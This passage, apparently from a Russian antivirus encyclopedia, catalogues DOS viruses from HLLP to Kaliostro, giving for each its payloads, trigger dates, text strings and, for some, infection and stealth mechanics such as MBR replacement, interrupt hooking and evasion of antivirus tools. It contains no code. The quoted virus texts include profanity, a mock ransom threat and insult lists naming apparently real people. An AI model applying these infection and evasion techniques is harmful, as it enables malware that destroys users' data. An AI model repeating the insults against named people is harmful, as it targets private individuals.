Happy birthday GOOD DOGGY!
I think you will like this virus and text
© 1996 SMACKMAN (press enter)
Bad command or file name
BUT why?
ежик
HLLP.Doggy.6202, 9535:
Элла! Я люблю тебя!
Bad command or file name
ZAK

HLLP.Feci

Неопасный нерезидентный вирус. Содержит текст "ЛДПР - НАШ ЛИ[1][1]ДЕР!!!
=== Feci Quod Potui, Faciant Meliora Potentes".

HLLP.FireLove

Опасный нерезидентный вирус. 18 числа месяца уничтожает содержимое 500 секторов диска C:. Содержит текст "Virus [Fired Love 10217] Version 1.0...! By L.S.Y.".

HLLP.Forever

Неопасный нерезидентный вирус. 23 числа выводит текст:
This is not a virus, not a trojan horse and not a logic bomb!
This is love, love forever!
Dear Maria I LOVE YOU !!!
I LOVE YOU! I LOVE YOU!
GROSSER & TAPEWORM & GURRE!
Press a key to continue
Содержит тексты "Disk is write-protected", "Lena", "Ira", " Diana", "Natasha", "Polina", "Tanya", "Olya", "Marina", "Maria","Katya","frv1".

HLLP.Frontier

Опасный нерезидентный вирус. Упакован утилитой AINEXE.Содержит ошибки. Пытается создавать на всех доступных дисках файл VICIOUS, после чего удаляет его. Изменяет системную дату и время. Имеет текст "frontier".

HLLP.Grosser

Неопасный резидентный вирус. Упакован утилитой WWPACK. Содержит текст:
GROSSER V3.0 , GROSSER & GOOD DOGGY ARE COOL GUYS! RULEZ!
MANY GREETINGS TO GURRE AND OTHERS
Note: TAPEWORM is no longer TAPEWORM
He is GOOD DOGGY now - NOW IT IS TIME TO GREET ALL FRIENDS (BOYS):
Granov Ilya, Ivan Dmitriev, Oryol Vladimir, Alex Fomin,
Gavrilov Ivan, Stupnikov Yaroslav,Tom Funikov,
Shishkin Vova, Alex Senin, Alex Bezyazichni,
Kirill Skobelev, Alexander Morozov, Maxim
Chudnov, Igor Voloshin, Pual Kobilchak,
Mike Funikov, .. the list will never end
AND MANY GREETINGS TO GIRLS (ESPECIALLY ELLA):
Loginova Polina, Soboleva Ella, Natasha Kulesh,
Lena Pronina, Katya Kiryanova, Masha Gromova,
Diana Kemularia, Irina Fionova, Alina Mikhailova
... and so on
Antivirus writers:
Igor Daniloff, Dmitry Lozinsky, Eugene Kaspersky,
Dmitry Mostovoy and others...
GREETINGS TO MUSIC GROUPS:
METALLICA, MEGADETH, SLAYER, SEPULTURA,
JIMI HENDRIX, DEEP PURPLE, NIRVANA, BEATLES, RED HOT CHILLI PEPPERS
ICE-T, ONYX, HOUSE OF PAIN, ICE CUBE, TONE LOC, PUBLIC ENEMY
ARRESTED DEVELOPMENT, KRISS KROSS AND OTHERS
AND NOW... IT IS TIME FOR FUCKS:
MANY FUCKS TO:
KORZIN OLEG, AFONIN ANTON, HARKOV SASHA, RJANIH ANDREY
prikL: Данное произведение является выдумкой автора !
Любые совпадения случайны

HLLP.Grunt

Неопасный нерезидентный вирус. Упакован LZEXE. 16 числа заполняет экран текстом "ЕЛЬЦИН - ПРЕЗИДЕНТ!!!". При заражении файлов создает временный файл grunt.swp. Содержит строку "School 1279".

HLLP.Happy

Неопасный нерезидентный вирус. Если по окончании работы вируса, клавиша Alt - нажата, то вирус выводит текст "DON'T WORRY, BE HAPPY !".В январе до 14 числа выводит текст "HAPPY NEW YEAR !".

HLLP.Inna.5260

Неопасный нерезидентный вирус. Написан на Turbo Pascal в формате EXE- файла и упакован утилитой PKLITE 1.12. При старте вируса, он производит поиск и заражение EXE-файлов, удаляет вирусный код из стартовавшей программы, запускает ее на выполнение, после чего заражает вновь. В период с 10.00 до 18.00 выводит текст.

HLLP.Izvrat

Неопасный резидентный вирус. Упакован PKLITE. Скрывает приращение длины инфицированных файлов. Содержит зашифрованные тексты:
Izvrat v3.1beta (cl) Dirty Nazi
Stealth Group World Wide
Thanks Int O`Dream & Borland
Happy birthday, Dirty Nazi!
У кaждoгo из нac быть мoгyт paзныe хoды, нo цeль y нac eдинa...
Koгдa я yмep, нe былo никoгo, ктo бы этo oпpoвepг... AidsTest. :)
Abnormal program termination

HLLP.Kasf

Очень опасный нерезидентный вирус. Уничтожает файлы с расширениями BAK, PAS, MCD и ASM. Создает и удаляет файл Kasf, за который и получил свое название.

HLLP.Metal.7929, 13040

Неопасные нерезидентные вирусы. HLLP.Metal.7929 упакован PKLITE, а HLLP.Metal.13040 зашифрован с помощью какой-то файловой защиты. Если вирусы стартуют из инфицированной программы AIDSTEST.EXE, то он выводят сообщение "И вот я в Aidstest-е !!! Ха-Ха-Ха", если из WEB.EXE - то "Привет Игорю Данилову ...". Также могут выводить тексты "Без паники !!!", "Programm Header error !!!".HLLP.Metal.7929 выводит иногда текст:
METALOLOM-VIRUS Version 3.0 © Clug
HLLP.Metal.13040 в понедельник в мае, или в субботу, или 25 числа
месяца выводит следующее сообщение:
Вам профессионаллы посвящается...
Данный вирус написан ....... догадайтесь сами кем !!!!!!!
Если Вы не перечислите 100 $ в пользу голодающих детей Африки то Ваш
жесткий диск будет уничтожен !!!
Выключать компьютер я Вам не советую так-как все DBF файлы находятся
в XMS памяти, а с диска временно стерты ! Так-что подумайте !!!
---------------------------------------------------------------------
У Вас есть 48 часов потом я вызову перезагрузку и Ваши файлы будут
УНИЧТОЖЕНЫ !!!
Время пошло ...
2880 минут

HLLP.Moonlight.4389

Очень опасный нерезидентный вирус. Написан на Turbo Pascal в формате EXE-файла и упакован утилитой DIET. В COM-файлы, а также в файл C:\IO.SYS или в C:\IBMBIO.COM записывает 5 байт передачи управления в BIOS на процедуру перезагрузки. Заражает EXE-файлы, создавая файл IMMAGE.PCX, записывая в него код вируса, копируя код EXE-файла. После чего оригинальный EXE-файл удаляется, а файлу IMMAGE.PCX присваивается его имя. Не заражает программы ADINF, ADINFEXT, AIDSTEST, DRWEB, SCAN. По окончании работы вирус выводит текст:
Data error reading drive C:
Abort, Retry, Ignore, Fail?
При нажатии на "A" вирус заканчивает работу, не отдавая управление программе-вирусоносителю. При нажатии на "R" вирус повторяет сообщение про ошибку. При нажатии на "I" производится перезагрузка системы. При нажатии на "F" вирус выводит текст "Fail on INT 24" и выходит в DOS. Содержит текст "Copyright©95 Moonlight Productions.".

HLLP.Myxa

Неопасный нерезидентный вирус. При совпадении значений месяца, дня и дня недели (например, первого января в понедельник и т.д.) иногда после запуска инфицированных программ проявляется графическим видеоэффектом похожим на бурлящую лаву и выводит текст "°±ІЫ Error free ЫІ±°". Содержит текст "Myxa".

HLLP.NotFound.6176

Неопасный нерезидентный вирус. Написан на Turbo Pascal. Содержит текст:
Borland Virus © 1994
Processor Intel PentiumTM not found.
17Gb disk free space not found.
512Mb extended memory not found.
16Mb XGA Video card not found.
Sound Blaster not found.
Sorry, your configuration doesn't match to run this...

HLLP.Novokuz>

Нерезидентный вирус. Содержит текст "Novokuznetsk - the city of FidoFuckers :( Feci Quod Potui, Faciant Meliora Potentes :)".

HLLP.RedAlert

Опасный нерезидентный вирус. Заражает EXE-файлы. В COM-файлы вирус записывает 23 байта кода, которые устанавливают системную дату в 1-ое января 2000 года и возвращают управление DOS. Также в эти COM-файлы записывается текст "Infected by Red Alert". Но возможно корректное восстановление таких COM-файлов.

HLLP.Rsw.5846

Неопасный нерезидентный вирус. Написан на языке высокого уровня, видимо, Turbo Pascal и упакован утилитой PKLITE v.1.12. В теле вируса присутствуют текстовые строки, принадлежащие компилятору фирмы Borland. Вирус производит поиск *.cOm и *.exE -файлов в каталогах, доступных через переменную PATH. Создает файл vvc.13 в каталоге найденного файла, записывает в созданный файл 5846 байт вирусного кода, после чего копирует файл-жертву в новый файл vvc.13. В дальнейшем удаляет оригинальный файл и присваивает файлу vvc.13 имя удаленного файла. В каталоге запущенного на выполнение инфицированного файла, вирус создает новый файл nortom.ini и копирует в него код зараженного файла без вирусного кода. По окончании своей работы вирус запускает на выполнение файл nortom.ini, после чего удаляет данный файл. В заголовке вируса по адресу 1Eh находится текстовая строка: "Я люблю пиво,компы и женщин :) By Rsw. Version 2.10.". 17 числа любого месяца вирус выводит на экран текст:
Блин , сегодня мой день рождения.
Я так рад , что не буду даже не чего зарожать ;-).
Copyright © 1994 by RSW
Release 17.06.94 , v. 2.10 (BugFix)
После чего, не отдавая управление программе-вирусоносителю заканчивает работу. Хорошо когда у человека 12 раз в году день рождения - тогда хоть раз в месяц, но и у нас будет праздник, и такой вот вирус "не чего зарожать" не будет.

HLLP.Rsw.8304

Аналогичен HLLP.Rsw.5846. Не упакован PKLITE. 17 числа любого месяца выводит сообщение:
I'm sorry You hawe virus.!
My name VVC 13 version 1.0 beta.
Special Thank's auhtor viruses Yeanke Doodle , Lozinsky D.N.
Virus by VVC & RSW release 25.02.94

HLLP.Satyricon.6624, 7824, 7840

Иногда оставляют в памяти резидентный код, который выводит текст "General error: Smoked cigarrete on hard disk C:".Содержат также строку "Satyricon v1.0".

HLLP.Unsteady (1,2)

Опасные нерезидентные вирусы. С марта по сентябрь или с февраля по август (HLLP.Unsteady (2)) выводят текст:
No Stealth, No Boot, No Stupid, but
this PC is now U N S T E A D Y !!!
Violated by Ludvi®ka L. PC virus !!!
После чего пытаются удалить файл CONFIG.SYS на текущем диске.

HLLP.UPI

Очень опасный нерезидентный вирус. Упакован PKLITE. Пытается удалить или разрушить файлы, имеющие расширения PAS,BAS,TXT,BAK,PCX,MID,PIC, CUT,C,ARC,PAK,ZIP,LZH,ICE, CHZ, ARJ. Содержит текст "Data Terminator 1.2,1993,UPI".

HLLP.Viper.7792

Неопасный нерезидентный вирус, написанный на Turbo Pascal в формате EXE -файла и упакованный компрессором PKLITE 1.12. Производит поиск файлов a*.*cOm и a*.*exE в каталогах, доступных через переменную PATH. Создает файл $viper$.TmP, в который копирует программный код стартовавшей инфицированной программы. При нахождении файла-жертвы, вирус создает файл $viper$.tm1, записывает в него 7792 байта вирусного кода, после чего копирует в этот файл программный код файла-жертвы. Удаляет файл-жертву и присваивает файлу $viper$.tm1 имя файла-жертвы. По окончании своей работы вирус запускает файл $viper$.TmP, после чего удаляет его.

HLLP.Weed.4080 (1,2), 5850 (1-5)

Опасные нерезидентные вирусы. Могут разрушить некоторые файлы при заражении.Упакованы LZEXE. HLLP.Weed.4080 содержит текст "WEED - v1.1".

HLLP.Xenia

Опасный нерезидентный вирус. В зависимости от своих счетчиков может уничтожить MBR и вывести текст:
Out of enviroment space
Memory allocation error, system halted.
А также в период с 2.00 до 4.00 выводит текст:
...Xenia... i will not forgive your treachery... ...but I love you... (S`96)
...hard disk 1 seems to be non-DOS disk...
и пытается отформатировать первую дорожку первого жесткого диска.

HLLP.Zenit

Неопасный нерезидентный вирус. Написан на Turbo Pascal. Иногда выводит текст:
Санкт-Петербургский
Футбольный клуб "ЗЕНИТ"!

Holera.1488

Очень опасный резидентный вирус. В файлы, имеющие расширения TXT и CPP, вирус записывает тексты: "На дворе трава, на траве дрова... Special for MIEM" и "Карл у Клары украл караллы, а Клара у Карла украла кларнет..." соответственно. Содержит текст "HOLERA II".

Holiday.2900

3 марта выводит сообщение. После чего ждет наступления 4 марта. Если этот день наступил, то вирус выводит текст:
Thank You for playing, see you...
Please, hit ENTER!

Holms.6161

Полиморфный вирус с очень серьезным алгоритмом шифрования. Пытается скрывать свое присутствие в компьютере - продлить свой "инкубационный" период. Для этого вирус подсчитывает контрольную сумму участка ПЗУ и запоминает ее. Если CRC ПЗУ при старте вируса не совпадает с ранее запомненной, то вирус устанавливает свою TSR-копию в память и заражает файлы. Если CRC совпадает - вирус активизируется с 17 числа месяца или через неделю после заражения данного файла. Т.о., в каждом зараженном файле хранится CRC участка ПЗУ и информация о времени его заражения. При заражении файла самостоятельно создает файл со случайным именем без расширения, копирует в него содержимое файла-жертвы, и удаляет файл-жертву. Заражает созданный файл и присваивает ему имя оригинального, ранее удаленного файла. При активном резидентном вирусе, при одновременном нажатии на левый и правый Shift, вирус проигрывает мелодию из фильма "Шерлок Холмс и доктор Ватсон" или прерывает ее. Файл COMMAND.COM вирус не заражает. В теле вируса имеются текстовые строки: "PATH=COMMAND COMEXE*.*", "Copyright 1989-1992. Version 1.05-NC for antivirus program debugging." и "Holms.".

Hoodoo.4456

Опасный нерезидентный шифрованный вирус. Под отладчиком или 21 числа месяца уничтожает содержимое жесткого диска и выводит на экран текст:
HOODOO V1.0 ©1996 by Terminus

Horsa.1185, 1230

Неопасные нерезидентные вирусы. Ищут *mand.com-файлы.Производят чтение и запись в файлы с помощью INT 25h, 26h (дисковые чтение, запись через драйверы DOS).

Hymn.1865, 1962 (1,2), 2144

Опасные резидентные (Hymn.1962 , 2144 - шифрованные) вирусы. Работоспособны только в MS-DOS версии 3.30. В день, значение которого совпадает со значением месяца, вирусы обнуляют некоторую служебную информацию в активном загрузочном секторе первого жесткого диска, фальшиво исполняют Гимн СССР и выводят следующую картинку.

Hypervisor.3120, 3128

Опасные резидентные вирусы. Определяют наличие локальной сети и предпринимает попытки "взлома" сети Novell. Содержат тексты:
HYPERVISOR
SECURITY_EQUALS
SUPERVISOR
GROUPS_I'M_IN
PASSWORD
IDENTIFICATION
IDENTIFICATIONThe
Hypervisor
LOGIN_CONTROL
SYS:SYSTEM/SYS:LOGIN/
NET$BIND.SYS NET$BVAL.SYS NET$OBJ.SYS NET$PROP.SYS NET$VAL.SYS
SECURITY_EQUALS
SUPERVISOR
GROUPS_I'M_IN
PASSWORD
IDENTIFICATION
IDENTIFICATIONThe
LOGIN_CONTROL

Hypnotiser.1784

Неопасный резидентный шифрованный вирус. Уничтожает файлы chklist.ms. Не активизируется при запуске в DOS-сессии MS-Windows, а также пытается удалить свою копию из памяти при запуске Windows. 10 числа месяца выводит на экран "радужные" картинки и слово "HYPNOTiSER". Содержит текст "HYPNOTiSER. By bQ".

0

9

I

Ice.746

Очень опасный резидентный вирус. "Перехватывает" INT 10h, 21h. При выводе символов на экран (f.9 Int 10h) периодически удваивает или утраивает количество выводимых символов. А также портит первый байт случайных секторов текущего диска. Содержит текст "Ice".

Iceland.848

Неопасный резидентный вирус. Заражает каждый 10 стартующий EXE-файл. 24 декабря выводит на экран текст "GleМileg jвl".

Ieronim.1581

Иногда выводит на экран "романтическую балладу":
Le voyage de condom
Pомантическая баллада
Использованные пpезеpвативы О,сколько их,изделий из pезины,
Плывут неспешно по Москве-pеке. Поглотят бездны мpачные моpей!
В воде их ловят коопеpативы Но,по волнам скитаясь непpестанно
И сушат за углом невдалеке Не всем тонуть - кому-то и всплывать...
И снова пpодают,и будут долго Один из них достигнет океана
Пpепятствовать pождению детей... И станет вокpуг света дpейфовать...
Но в сpок положенный впадают в Волгу И будет путь его теpнист и долог,
Буpжуйских избежавшие сетей. И в ночь,когда муссонный ливень льет,
Их pыбы жpут,их чайки жpут,и вскоpе Его поймает тpалом ихтиолог,
Сдыхают от закупоpки кишки... Что пятый день,не пpосыхая,пьет.
Но уцелевшие впадают в моpе, И внятный голос музы он услышит,
Качаясь на волнах,как поплавки. И,ощущая твоpческий поpыв,
Нептун колеблет зыбкие глубины, Сейчас же диссеpтацию напишет
И гонит тучи по небу Боpей... На тему:"Контpацепция у pыб".

Implant.6182

Опасный полиморфный файлово-загрузочный стелс-вирус. Заражает COM, EXE, SYS-файлы, MBR первого жесткого диска и загрузочные сектора дискет. При заражении флоппи-дисков вирус форматирует дополнительную дорожку для размещения исходного загрузочного сектора и своего продолжения. При старте программ AR*.*, PK*.*, LH*.*, BA*.* (ARJ, PKZIP, LHA и BACKUP) вирус выключает свой стелс-режим. При старте программы WIN.COM, вирус добавляет в ее командную строку параметр /D:F (отключение 32-битного доступа к диску). Если стартует программа TBSCAN, то вирус добавляет в командную строку параметры "co" и "nm", которые отключают прямой доступ к диску (compability mode) и проверку памяти. Вирус не заражает файлы TB*.*, SC*.*, F-*.*, GU*.*, а также файлы в именах которых присутствуют буквы "V", "MO", "IO", "DO", "IB" и цифры 0-9. Вирус отказывает в доступе к файлам CHKLIS*.*. 4 июня вирус пытается уничтожить содержимое нулевой дорожки (но это ему не удается из-за ошибки).

Inoculation.1786, 1819

Неопасные резидентные вирусы. Сами себя относят к классу "антивирусов". При заражении файлов, уже инфицированных вирусами Inoculation, эти вирусы пытаются удалить из файлов "новоявленных гостей". Перехватывают INT 2Fh.

Int12

Неопасный загрузочный вирус. При заражении загрузочных секторов дисков производит поиск строки "NON-SYSTEM DISK", написанную, как заглавными, так и прописными буквами. И сразу за этой строкой вирус записывает 40 байт своего кода, который "перехватывает" INT 12h и читает в память последний сектор диска. В этот последний сектор вирус записывает свой основной код. Вирусный обработчик INT 12h производит "перехват" INT 13h и "освобождение" ранее захваченного INT 12h. Вирус содержит строку "LOVE".

Int13

Опасный резидентный вирус. Перехватывает INT 13h, INT 21h. Записывает свой код в начало программ, причем оригинальное начало файлов может быть утеряно. Как правило, восстановить инфицированные файлы не предоставляется возможным. Внутри имеется строка "Int 13".

IntC1

Неопасный загрузочный вирус. Размещает свою резидентную копию во второй половине таблицы векторов прерываний. Для заражения флоппи-дисков "переназначает" вектор INT 40h на INT 0C1h.

IntCE

Опасный загрузочный вирус. После 120 загрузок с жесткого диска уничтожает случайные сектора жесткого диска.

Internal.1381, 1459

Неопасные нерезидентные вирусы. Иногда могут произвести самоизлечение стартовавшего файла и вывести среди на экран "среди мусора" сообщение:
INTERNAL ERROR 02CH.
PLEASE CONTACT YOUR HARDWARE MANUFACTURER IMMEDIATELY !
DO NOT FORGET TO REPORT THE ERROR CODE !

Inferno.781

Опасный резидентный зашифрованный вирус. Может уничтожить MBR жесткого диска. Содержит текст "NAME OF THIS VIRUS IS "INFERNO" NEXT VERSION WILL BE BETTER...".

IntFF

Во всей записываемой на диск информации может изменять последовательность байт 0CDh 21h (INT 21h) на 0CDh 0FFh (INT 0FFh). Изменяет символы, введенные с клавиатуры.

Invisible.2926, 3223

Опасные полиморфные вирусы. При старте инфицированной программы заражают MBR. Вирусный код в MBR также является полиморфным. Трассируют INT 13h, 21h. В зависимости от системной даты могут записать в стартующие файлы 411 или 602 байт кода.

IronE

Неопасный шифрованный стелс-Boot-вирус. Заражает Boot-секторы жестких и гибких дисков. Перехватывает INT 08, 13h, 21h, 40h. Содержит текст "(IronE 2.3)".

Itv.449

5 мая и 16 сентября выводит на экран текст "Viva MВxico!". Содержит текст "ITV85020203 1990.".

Itavir.3187

Очень опасный нерезидентный вирус. Поиск и заражение EXE-файлов производит через дисковые DOS прерывания INT 25h, 26h. Уничтожает содержимое дисков. Содержит тексты:
AZione radaщOMMAND COM
A:\щOMMAND.COM 0123456789ABCDEFper questa volta.........
.......AHI..AHI..AHI.......
Ho proprio l`impressione di essere un Virus
Maligno,......
Molto maligno (naturalmente)
Non vi rimane che da azionare l`interruttore
AUGURI!!!....................

IVP.April

Очень опасный нерезидентный шифрованный вирус. В апреле выводит текст:
Once again arrives April showers,
The Devil came out to use his evil powers.
He arose from his sacred den,
To forget and do one of his evil sins.

The Devil came forth to a rich occupied land,
And gathered black dark clouds from storms with his bare hands.
Strikes of lightening, large and bold,
Murdered many, from the young to old.
Creatures and critters ran for their life,
But the rushing waters drowned their lives.
"The devil has left!" cried from the joys,
Of the few remainding survivors saved by the lord.
The sunshine beamed down from the dark blue sky,
The ending of April as March came by.
The fears of April showers will always remain,
Just wait till next year, as the Devil will stike again.
и уничтожает 256 первых секторов дисков A:, B:, C:, D:, E:, F:, G:, H:, X:, Y:, Z:. Содержит строку "April-ShowersUnknowN".

0

10

J

Jerusalem (1,2)

Опасные резидентные вирусы. Рисуют в левом нижнем углу черный квадрат и существенно замедляют скорость работы компьютера. В пятницу 13 числа удаляют все запускаемые программы.

Jerusalem.Barcelona

Неопасный резидентный вирус. Иногда выводит сообщение:
CATALUNYA LLIURE
FORA LES FORCES D`OCUPACIO
MORT ALS TERRORISTES TRICORNUTS

Jerusalem.Canary.1970

Иногда мигает экраном и исполняет какую-то мелодию. Содержит строку "\COMMANDMC70: Moroccan Canary".

Jerusalem.Cvex.5120 (1-10), 6144, 6400

Некоторые из этих вирусов являются опасными. 10 июня они уничтожают содержимое первых 17 секторов жесткого диска. Jerusalem.Cvex.6144,6400 являются опасными полиморфными вирусами. Вирусы содержат тексты на китайском и английском языках:
COMMAND.COM IBMBIO.COM IBMDOS.COM SETVER.EXE EMM386.EXE DOSSHELL DEBUG
SERVER.EXE VSAFE MSAV MWAV CPAV NAV TRACER TRMATE HACKER GILLETTE
PCCILLIN TPS ZLOCK ZTEST GSCAN HVIR AVCOM AVEXE OFFEXE OFFCOM CKVI KLVI
DEVI BTOOL RTOOL TDISK HDPI VCOPY VSHIELD VALIDATE VB TEST VIR WIN
KERNEL.EXE KRNL GDI.EXE USER.EXE PROGMAN.EXE DOSX.EXE EXCEL CV.EXE
SYMDEB MASM.EXE LINK.EXE LIB.EXE BASIC BASCOM BASRUN ET.COM ET16N.COM
ET16E.COM ET16V.CO A-16.COM PE3 DW3 ACAD CLP FOX DBASE CLIPPER RTLINK
LOTUS 123
CVEX Version 3.00
© Copyright CVEX Corp. (in association with Stoned II Lab.)
All rights reserved. Made In Taiwan.
Serial No.:1993/3/6.
Computer Virus Extened Association. (C.V.E.X.)
или подобный этому:
CVEX Version 4.00
for Microsoft MS-DOS Version 6.2
© Copyright CVEX Corp. (in association with Stoned II Lab.)
© Copyright PATLABOR Corp.
All rights reserved. Made In Taiwan.
Serial No.:1994/1/1.
Computer Virus Extended Association. (C.V.E.X.)

Jerusalem.Czech

Опасный резидентный вирус. Через 30 минут после установки своей TSR- копии постоянно выводит в левом верхнем углу экрана мигающее слово "Ha!Ha!". Удаляет программы BASICA.EXE, CURE.EXE, LOTUS.COM, CWI.EXE, ETBASIC.EXE, BASICA.COM, 123.XE, DBASE.EXE, BASIC.COM при их старте.

Jerusalem.Distrutto

Опасный резидентный вирус. 4 ноября форматирует все доступные диски и выводит сообщение:
******* Ora il tuo PC e' DISTRUTTO !!! *******

Jerusalem.Glory

Неопасный резидентный вирус. 4 марта расшифровывает и выводит текст:
Eternal glory to those Chinese people who fell in 1989,
in the noble struggle for freedom of speech, expression,
the press, assembly, association, procession,
demonstration and the freedom to strike!
Not one single drop of blood, not one single tear,
not one single act of courage will have been wasted in vain.
Wild grasses spreading o'er the plain
With every season come and go.
Heath fire can't burn them up, again
They rise when the vernal winds blow.

Jerusalem.Invader (1-10)

Очень опасные резидентные вирусы. Заражают COM и EXE-файлы (кроме COMMAND.COM) и boot-секторы жестких дисков и флоппи-дисков. Для флоппи форматируют дополнительную дорожку, на которую записывают собственный код и оригинальный boot-сектор. Перехватывают INT 8, 9, 13h, 21h. В зависимости от своих внутренних счетчиков могут совершать холостой цикл при каждом вызове прерывания INT 8 (таймер), уничтожать информацию на дисках, исполнять мелодию, уничтожать содержимое CMOS-памяти.

Jerusalem.Kylie

Иногда играет мелодию. Имеется строка "Kylie Minogue".

Jerusalem.Mabuhay.2660 (1,2), 2695

Опасные резидентные вирусы. 1 числа (Jerusalem.Mabuhay.2660) или 12 июня (Jerusalem.Mabuhay.2695) вирусы пытаются уничтожить содержимое дисков C:, D:, E:,F: играют Филлипинский гимн.

Jerusalem.Sunday

Опасный резидентный вирус. Удаляет все запускаемые программы.

Jerusalem.VTec

Опасный резидентный вирус. Уничтожает файлы CHKLIST.CPS и SMARTCHK.CPS. 10 марта уничтожает содержимое CMOS-памяти и секторов дисков. После чего выводит сообщение:
Don~t TRUST any virus scanner!
-- HKs VTech --

Jerusalem.Wanderer

Неопасный резидентный вирус. Не заражает файлы, имена которых начинаются на WP, SC, WI. Содержит зашифрованный текст "[I am a Wanderer ,May 30th,1994 Korea]".

Jindra

Очень опасный загрузочный стелс-вирус. Периодически уничтожает содержимое секторов дисков и CMOS-памяти. Содержит текст "JINDRA_0".

Jindra.2049

Очень опасный нерезидентный полиморфный вирус. В зависимости от своих внутренних счетчиков может уничтожать содержимое секторов дисков, CMOS- памяти и выводить на экран текст "Jindra&Pastika je zde !!!". А также Jindra.2049 может заразить активный загрузочный сектор жесткого диска загрузочным вирусом Jindra, который в дальнейшем будет "развиваться" отдельно от родителя и заражать сектора дисков. Jindra.2049 удаляет файлы: CHKLIST.MS, C:\AVG*.GRS, C:\AGUARD.DAT, C:\DOS\VSAFE.COM, VSAFE.COM.

Joker.1918

Неопасный резидентный шифрованный вирус. Содержит текст "Kiev '95 by Pupil of 9-V form [JOKER.HA-HA-HA!]:G:A:PZ JOKERSYS".

Jolter.2197

Неопасный резидентный шифрованный стелс-вирус. Иногда вызывает "дрожание" экрана. Содержит тексты "ARJBSACHKDIEICELHAPKLPKZRAR", "COMMAND.COM", "COMMAND EXECOM", "*.COM *.EXE", "IBMJOLTER 4.0".

Joshi

Неопасный загрузочный стелс-вирус. "Переживает" теплую перезагрузку при нажатии Ctrl-Alt-Del. 5 января выводит текст "Type `Happy Birthday, Joshi'!" и ждет ввода с клавиатуры фразы "Happy Birthday, Joshi!".

Jouce.1608

Опасный нерезидентный вирус. По средам автор, видимо, хотел уничтожать 255 секторов жесткого диска, но этого не происходит. Но непристойный текст по средам выводится на экран. Вирус также содержит текст "*Jouce und Krisque*, Version 0001h.".

July29 (1-4)

Опасные загрузочные вирусы.Заражают boot-сектора дискет и "винчестера". Располагаются в трех последовательных секторах. Если в процессе считывания двух последних секторов "хвоста" вируса произойдет ошибка чтения,то вирусы выводят сообщение "BIOS fatal error. System halted..." и "вешают" систему. При заражении жесткого диска вирусы записывают истинный MBR и следующий за ним сектор в 6 и 7 сектора нулевого цилиндра. В оригинальном MBR вирусы исправляют 3 байта адреса активного раздела DOS на адрес: головка - 0, цилиндр - 0, сектор - 3. И записывают с указанного адреса 3 сектора вирусного кода.Вирусы являются стелс-вирусами. При попытке чтения или записи в MBR или boot-сектора дискет, подставляется оригинальный неинфицированный сектор. На компьютерах класса AT, 29 июля вирусы выводят сообщение "July 29 today..." и вирусы July29 (1-3) перехватывают INT 09 (клавиатура). Если произойдет нажатие на Ctrl-Alt-Del, то вирусы уничтожают содержимое 7ми первых секторов жесткого диска.
July29 (2) блокирует исполнение некоторой программы (видимо, ADINF.EXE), а July29 (3) излечивает MBR жесткого диска при старте или чтении первого сектора этой же программы. July29 (4) "перехватывает" INT 8,9,13h,21h.При нажатии на Ctrl-Alt-Del этот вирус заражает еще раз для "подстраховки" заражает MBR жесткого диска. При старте программ с именами *T.E*, *B.E*, *F.E* (AIDSTEST.EXE, DRWEB.EXE, ADINF.EXE) July29 (4) или "вешает" систему, или удаляет свой код из MBR на время работы данных программ. Вирусы July29 замещают своими кодами загрузочные вирусы семейства Stoned. Содержат также строки: July29 (1)- "v3.1", July29 (2) - "v4.1", July29 (3) - "v4.5", July29 (4) - "v5.0". July29 (4) 29 числа удаляет каждую 8 стартовавшую программу.

JumpBoot

Опасный файлово-загрузочный вирус. Заражает MBR жесткого диска, а также внедряется в файлы, записываемые на гибкие диски. При старте такого инфицированного файла вирус заражает MBR жесткого диска, записывая оригинальный сектор и свое продолжение в два сектора на первой дорожке, содержащие нулевые байты. При загрузке системы с инфицированного MBR, вирус располагает часть своего кода в таблице векторов прерываний по адресу 0:200h и перехватывает INT 13h. При записи на жесткий диск сектора, содержащего первыми байтами EBh или E9h (переход-jump) вирус записывает вместо этого сектора свой код. Причем после этой записи вирус обезвреживает в памяти данную процедуру заражения файлов. Т.е., до следующей перезагрузки производится всего одна запись на гибкий диск. Вирус также является стелс-вирусом, подставляя вместо инфицированного MBR оригинальный сектор.

Jumper (1,2)

Неопасные загрузочные вирусы.При старте с флоппи-диска, вирусы заражают MBR "винчестера", "перехватывают" INT 1Ch, ждут загрузки DOS, после чего "перехватывают" INT 21h. Заражают флоппи-диски при функциях ввода- вывода на консоль и смене текущего диска (f.0Ah, 0Eh Int 21h). Иногда выводят на экран символ "ю" ASCII 0EEh.

JuneTunes.1784

В июне с вероятностью 3/4 играет одну из трех мелодий.

Junior.224

Неопасный резидентный вирус. Изменяет вызов INT 21h для старта программ резидентной части командного процессора на INT AEh и перехватывает INT AEh. Содержит строку "Junior".

0

11

K

Kaczor.4444, 4447

Неопасные полиморфные файлово-загрузочные стелс-вирусы. При первом запуске инфицированной программы вирусы заражают MBR жесткого диска и устанавливают свои копии в верхние адреса памяти. Перехватывают INT 13h, 21h, причем основное тело вируса зашифровано, а точки входа в вирусные обработчики прерываний размещены в случайном месте после основного кода. Заражают EXE-файлы только на гибких дисках. При загрузке системы с зараженного MBR, вирусы считывают свое продолжение - 9 секторов, находящихся по адресу 0:0:9, размещают свою TSR-копию в памяти, "перехватывают" INT 12h (для возвращения уменьшенного размера памяти на 6 до загрузки DOS) и 1Ch. Ждут загрузки DOS, после чего "перехватывают" INT 13h, 21h и 3 марта INT 08. Если во время загрузки системы в буфере клавиатуры окажется слово "kaczor", то вирусы выводят на экран сообщение "Zrobione." и "самоизлечиваются" (удаляют свой код из MBR). Если же в буфере клавиатуры будет находиться слово "test", то вирусы могут вывести, примерно такой, текст:
Wersja.........2
Kodowanie......4
Licznik HD....10
Где "Kodowanie" - номер используемого вирусами шифровщика (всего вирусы имеют 10 различных комбинаций шифрования), а "Licznik HD" - счетчик заражений MBR. 3 марта вирусы "перехватывают" еще и INT 08 и постоянно "дергают" изображение на экране.

Kak.391

Иногда выводит на экран "Как много вирусов хороших ...".

Kaliostro.1752, 2098

